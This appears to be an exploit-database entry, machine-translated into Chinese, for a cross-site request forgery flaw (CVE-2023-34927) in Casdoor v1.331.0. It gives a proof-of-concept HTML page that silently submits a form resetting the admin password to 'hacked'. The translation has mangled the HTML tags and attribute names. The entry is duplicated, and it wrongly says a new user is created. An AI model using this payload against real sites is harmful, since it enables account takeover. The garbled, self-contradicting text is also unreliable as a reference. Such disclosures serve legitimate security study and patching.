#exploit title: casdoor v1.331.0-'/api/set -password'csrf
#application: casdoor
#版本:=1.331.0
#日期: 03/07/2024
#利用作者: Van Lam Nguyen
#供应商homepage: https://casdoor.org/
#软件link: https://github.com/casdoor/casdoor
#在: Windows上测试
#CVE : CVE-2023-34927
概述
=================================================================
发现Casdoor v1.331.0及以下是在端点/API /SET-PASSWORD中包含跨站点伪造(CSRF)。
此漏洞使攻击者可以通过提供精心设计的URL任意更改受害者用户的密码。
概念证明
=================================================================
向/api /set-password提出了未经授权的请求,该请求绕过了旧密码输入身份验证步骤
html
表单ACTION='http://localhost:8000/api/set-password'method='post'
输入名称='用户主'value='内置#45;在'type='隐藏'中
输入名称='用户名'value='admin'type='隐藏'
输入名称='newpassword'value='hacked'type='隐藏'
输入类型=提交
/形式
脚本
history.pushstate('','','/');
document.forms [0] .submit();
/脚本
/html
如果在执行时将用户登录到Casdoor WebApp,则将在应用程序中创建新用户,并使用以下凭据
Userowner:构建#45; in
用户名:管理员
newPassword:被黑客入侵
#application: casdoor
#版本:=1.331.0
#日期: 03/07/2024
#利用作者: Van Lam Nguyen
#供应商homepage: https://casdoor.org/
#软件link: https://github.com/casdoor/casdoor
#在: Windows上测试
#CVE : CVE-2023-34927
概述
=================================================================
发现Casdoor v1.331.0及以下是在端点/API /SET-PASSWORD中包含跨站点伪造(CSRF)。
此漏洞使攻击者可以通过提供精心设计的URL任意更改受害者用户的密码。
概念证明
=================================================================
向/api /set-password提出了未经授权的请求,该请求绕过了旧密码输入身份验证步骤
html
表单ACTION='http://localhost:8000/api/set-password'method='post'
输入名称='用户主'value='内置#45;在'type='隐藏'中
输入名称='用户名'value='admin'type='隐藏'
输入名称='newpassword'value='hacked'type='隐藏'
输入类型=提交
/形式
脚本
history.pushstate('','','/');
document.forms [0] .submit();
/脚本
/html
如果在执行时将用户登录到Casdoor WebApp,则将在应用程序中创建新用户,并使用以下凭据
Userowner:构建#45; in
用户名:管理员
newPassword:被黑客入侵